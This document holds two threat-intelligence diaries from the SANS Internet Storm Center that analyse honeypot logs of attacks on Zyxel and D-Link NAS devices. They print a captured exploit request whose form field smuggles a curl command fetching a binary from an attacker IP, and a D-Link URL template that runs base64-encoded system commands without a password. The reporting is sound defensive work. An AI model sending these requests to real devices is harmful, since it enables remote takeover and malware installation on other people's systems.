Yesterday, I talked about attacks against a relatively recent D-Link NAS vulnerability. Today, scanning my honeypot logs, I found an odd URL that I didn't recognize. The vulnerability is a bit older but turns out to be targeting yet another NAS.

The sample request:

POST /cmd,/ck6fup6/portal_main/pkg_init_cmd/register_main/setCookie HTTP/1.0
User-Agent: Baidu
Accept: */*
Content-Length: 73
Content-Type: application/x-www-form-urlencoded
Host: [redacted]

pkgname=myZyXELcloud-Agent&cmd=%3bcurl%2089.190.156.248/amanas2&content=1

The exploit is simple: attempt to download and execute the "amanas2" binary and execute it. Sadly, I was not able to retrieve the file. Virustotal does show the URL as malicious for a couple of anti-malware tools [1]

Oddly, I am seeing this pattern only the last couple days, even though the vulnerability and the PoC were disclosed last year [2]:

Date Count
April 27th 56
April 28th 1530
April 29th 899
April 30th 749

Based on our logs, only one IP address exploits the vulnerability: %%ip: 89.190.156.248%%. The IP started scanning a couple of days earlier for index pages and "jeecgFormDemoController.do, likely attempting to exploit a deserialization vulnerability in jeecgFormDemoController 

[1] https://www.virustotal.com/gui/url/ed0f3f39dce2cecca3cdc9e15099f0aa6cad3ea18f879beafe972ecd062a8229?nocache=1
[2] https://bugprove.com/knowledge-hub/cve-2023-4473-and-cve-2023-4474-authentication-bypass-and-multiple-blind-os-command-injection-vulnerabilities-in-zyxel-s-nas-326-devices/

 

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

D-Link NAS Device Backdoor Abused, (Mon, Apr 29th)

End of March, NetworkSecurityFish disclosed a vulnerability in various D-Link NAS devices [1]. The vulnerability allows access to the device using the user "messagebus" without credentials. The sample URL used by the PoC was:

GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=<BASE64_ENCODED_COMMAND_TO_BE_EXECUTED>

In addition to not requiring a password, the URL also accepts arbitrary system commands, which must be base64 encoded. Initial exploit attempts were detected as soon as April 8th. The vulnerability is particularly dangerous as some affected devices are no longer supported by DLink, and no patch is expected to be released. DLink instead advised to replace affected devices [2]. I have not been able to find an associated CVE number.

Graph of hits for URLs that include "user=messagebus" with two distinct peaks. One early in april and one late in april

After the initial exploit attempts at the beginning of the month, we now see a new distinct set of exploit attempts, some of which use different URLs to attack vulnerable systems. It appears that nas_sharing.cgi is not the only endpoint that can be used to take advantage of the passwordless "messagebus" account.

So far, we do see these three different URLs

/.most/orospucoc.cgi
/cgi-bin/nas_sharing.cgi
/cgi-bin/orospucoc.cgi

It is not clear if "orospucoc.cgi" is a distinct different vulnerability. But it appears more like another endpoint allowing for command execution, just like the original "nas_sharing.cgi" endpoint. I found no documentation mentioning the "orospucoc.cgi" endpoint. If anybody has an affected D-Link NAS device, let me know if this endpoint exists. In particular, "/.most/orospucoc.cgi" is odd. This URL starts showing up in our logs on April 17th. The term "orospucoc" in Turkish translates to the English "bitch", which could indicate that this is not an actual vulnerable URL, but maybe a backdoor left behind by earlier attacks. The use of the directory ".most" and the payload "echo most" may point to a backdoor rather than a valid binary shipped with the device's firmware.

Any feedback from DLink NAS users is appreciated.

The most common command executed is "uname -m" which is likely used to identify vulnerable devices. Other commands include:

echo    @hackerlor0510
echo    most

 

[1] https://github.com/netsecfish/dlink
[2] https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10383

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
❌